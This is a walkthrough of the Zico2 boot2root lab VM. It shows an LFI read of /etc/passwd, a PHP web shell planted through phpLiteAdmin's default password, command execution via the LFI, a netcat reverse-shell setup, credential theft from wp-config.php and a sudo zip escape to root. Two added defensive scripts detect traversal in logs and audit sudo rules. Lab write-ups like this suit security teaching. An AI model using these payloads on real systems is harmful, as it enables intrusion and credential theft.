kevincarrera
Today we are going to take on another boot2root challenge, Zico2 by "Rafael", where we have to root the system to complete the challenge.
Download this VM here: https://download.vulnhub.com/zico/zico2.ova
Difficulty Level: Intermediate
Penetration Methodologies
Scanning
- Netdiscover
- Nmap
Enumeration
- HTTP surfing
- Directory enumeration
Exploiting
- LFI
- Obtaining reverse shell via netcat
Privilege Escalation
- Login through SSH
- Identify user's credentials
- Abusing SUID binaries
Capture the flag
Walkthrough
Scanning
Let's start off by finding the target's IP with netdiscover; in this case it is 192.168.1.108.
Code:
netdiscover

Time to scan the target's IP with Nmap. The scan result shows that port 22 (ssh), port 111 (rpcbind) and port 80 are open.
Code:
nmap -A 192.168.1.108

Enumeration
Since port 80 is running HTTP, our obvious choice is to browse the target's IP in the browser.

We scroll through the page and click on "check them out", as can be seen in the following screenshot.

Clicking there takes us to a page whose URL passes the file name tools.html as a parameter, so it could be vulnerable to LFI; let's verify it.

Here I tried for LFI and succeeded with "/../../etc/passwd". Now that we can read the contents of the passwd file, we find a user "zico" in there. Let's just save this info for now.

While enumerating directories with dirb, we found an interesting directory, "/dbadmin".
Code:
dirb http://192.168.1.108/

When we browse the "/dbadmin" directory, it displays a file named "test_db.php".

Here we see a PHP database login page along with its version number, so we can google it, or, going by the name "test_db", guess that it is a default setup.
So we tried "admin" as the password, and it worked.

Exploiting
Next, we use Searchsploit which, as the name indicates, searches for all exploits and shellcodes for phpliteadmin (in this case). In the screenshot we can see that it is vulnerable to remote PHP code execution, and the EDB-ID for it is 24044. Once we copy it to the current working directory (/root/24044.txt) and open it, we find guidelines for exploiting the db.
Code:
searchsploit phpliteadmin
searchsploit -m 24044
cat 24044.txt

Here we have followed the guidelines:
Step 1: Created a database and named it "shell.php" (we had to add the extension ".php" to the database name).

Step 2: Created a table "shell". Inside the table, we created a column "field", set the type of the column to "Integer" and set the default value to <?php echo system($_GET['cmd']); ?>.

From the following screenshot, it can be seen that our PHP code has been saved in the database.

Now we just have to run the file (the full path of the created PHP file is exposed on the page).
So, to execute the file we use the previously detected LFI vulnerability, and we got lucky: we are running as "www-data".
Code:
http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=whoami
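The two requests above, the traversal to /etc/passwd and the call to shell.php with a cmd parameter, are exactly what a defender would want to catch in the web server's access log. The following is an added example written for this write-up, not code from the original post or from the Zico2 VM: it parses Apache-style log lines (constructed samples are embedded below, with made-up timestamps and client addresses) and flags path traversal, sensitive file names and command parameters. It goes a step beyond the page by also decoding percent-encoded and double-encoded traversal, which the walkthrough does not show.

```python
"""Flag LFI and LFI-to-RCE attempts in Apache-style access logs.

Added example for this write-up (not code from the original post or the VM).
The log lines below are constructed; the request shapes mirror the
view.php?page=... requests used in the walkthrough.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Enough of the Apache "combined" format to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')          # a "../" or "..\" segment
SENSITIVE_RE = re.compile(r'/etc/(passwd|shadow)|/proc/self', re.I)
COMMAND_PARAMS = {"cmd", "exec", "command"}                    # constructed list; extend as needed


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e%252f (double-encoded) still yields ../ ."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the set of finding labels for one request target (path plus query string)."""
    findings = set()
    query = urlsplit(target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)            # parse_qsl already decoded one layer
        if TRAVERSAL_RE.search(value):
            findings.add("path_traversal")
        if SENSITIVE_RE.search(value):
            findings.add("sensitive_file")
        if name.lower() in COMMAND_PARAMS:
            findings.add("command_param")
    # Traversal to a file the attacker controls plus a command parameter is the LFI-to-RCE pattern.
    if {"path_traversal", "command_param"} <= findings:
        findings.add("lfi_to_rce")
    return findings


def scan_log(lines):
    """Return (client_ip, target, sorted findings) for every suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                         # not a request line we understand; skip it
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), sorted(findings)))
    return hits


# Constructed sample log: one benign request, the two attack shapes from the
# walkthrough (the second one percent-encoded), and an unrelated page view.
SAMPLE_LOG = [
    '192.168.1.50 - - [10/Jan/2024:10:00:01 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Jan/2024:10:00:09 +0000] "GET /view.php?page=../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [10/Jan/2024:10:01:30 +0000] "GET /view.php?page=..%2F..%2Fusr%2Fdatabases%2Fshell.php&cmd=whoami HTTP/1.1" 200 21 "-" "curl/7.88"',
    '192.168.1.77 - - [10/Jan/2024:10:02:00 +0000] "GET /dbadmin/test_db.php HTTP/1.1" 200 3100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(findings)}")
```

The real fix on the application side is for view.php to resolve the page parameter against an allowlist of known file names instead of including whatever path it is handed; the detector above is the compensating control for the time before that fix lands.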

Time to set up a netcat listener on our local machine and run the python reverse-shell one-liner through the uploaded shell's cmd parameter to get a reverse shell (refer to the next screenshot for the listener).
Python code reference: pentestmonkey.net
Code:
http://192.168.1.108/view.php?page=../../usr/databases/shell.php&cmd=<python reverse shell one-liner>

To get a proper interactive TTY we use a python one-liner. Once in the shell, we find the "wp-config.php" file inside "/home/zico/wordpress".
Code:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
ls
cd /home
ls
cd zico
ls
cd wordpress
ls

Inside the wp-config.php file, we discover a database user zico and its password.
Code:
cat wp-config.php

Privilege Escalation
We use the recently discovered credentials to log in through SSH.
Then we use the sudo command to list all the commands the user can run with root privileges, and we can see that the user can run both tar and zip as root without entering a password.
So now we escalate privileges from "zico" to "root". First, we create a file "raj", then we perform three different tasks in a single line: first we zip the file "raj", second we place the archive at /tmp/nisha.zip, and lastly we unzip it, which pops the root shell.
Finally, we get "flag.txt" inside the root directory. Hence, we accomplished the task.
Code:
ssh zico@192.168.1.108
sudo -l
touch raj
sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
cd /root
ls
cat flag.txt
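The sudo -l output is the control point in this phase: the rule letting zico run zip and tar as root with NOPASSWD is the whole privilege-escalation path. As an added example (not the post's own code; the sudo -l text it parses is a constructed sample laid out the way sudo prints it), the script below reads that output and flags NOPASSWD rules on binaries the walkthrough shows spawning a shell. A defender would remove such a rule or replace it with a wrapper script that takes no user-controlled arguments.

```python
"""Audit 'sudo -l' output for NOPASSWD rules on shell-capable binaries.

Added example for this write-up (not code from the original post or the VM).
SAMPLE_SUDO_L is a constructed sample laid out the way sudo prints it; the
rule it contains is the one the walkthrough abuses.
"""
import os
import re

# Binaries the walkthrough shows escaping to a root shell through sudo.
# Constructed starting list; real audits use a much longer catalogue.
SHELL_CAPABLE = {"zip", "tar"}

# One rule line, e.g. "    (root) NOPASSWD: /usr/bin/zip, /usr/bin/tar"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(output):
    """Turn the text of 'sudo -l' into a list of {runas, tags, commands} dicts."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True                  # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas").strip(),
            "tags": set(re.findall(r'(\w+):', m.group("tags"))),
            "commands": [c.strip() for c in m.group("cmds").split(",") if c.strip()],
        })
    return rules


def audit(rules):
    """Flag rules whose command is ALL or a binary known to hand out a shell."""
    findings = []
    for rule in rules:
        for cmd in rule["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL" or binary in SHELL_CAPABLE:
                findings.append({
                    "runas": rule["runas"],
                    "command": cmd,
                    # No password prompt means a stolen or weak user password is enough.
                    "severity": "critical" if "NOPASSWD" in rule["tags"] else "high",
                    "reason": f"{binary} can hand out a shell as {rule['runas']}",
                })
    return findings


# Constructed sample in sudo's own layout: the NOPASSWD zip/tar rule from the
# walkthrough plus one harmless rule that should not be flagged.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zico on zico:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on zico:
    (root) NOPASSWD: /usr/bin/zip, /usr/bin/tar
    (root) /usr/bin/id
"""

if __name__ == "__main__":
    for f in audit(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f['severity']}] ({f['runas']}) {f['command']}: {f['reason']}")
```

Run it against the output of sudo -l collected from each host (or against sudoers exports from configuration management) and treat every critical finding as a ticket: restricting zip to a fixed argument list is not enough, since its own options hand out command execution, so the rule itself has to go.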

Here is the complete reference to exploit sudo rights: https://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights/
Author: Nisha Yadav is trained in Certified Ethical Hacking and Bug Bounty Hunting. She is currently working at Ignite Technologies as a Security Analyst. Connect with her here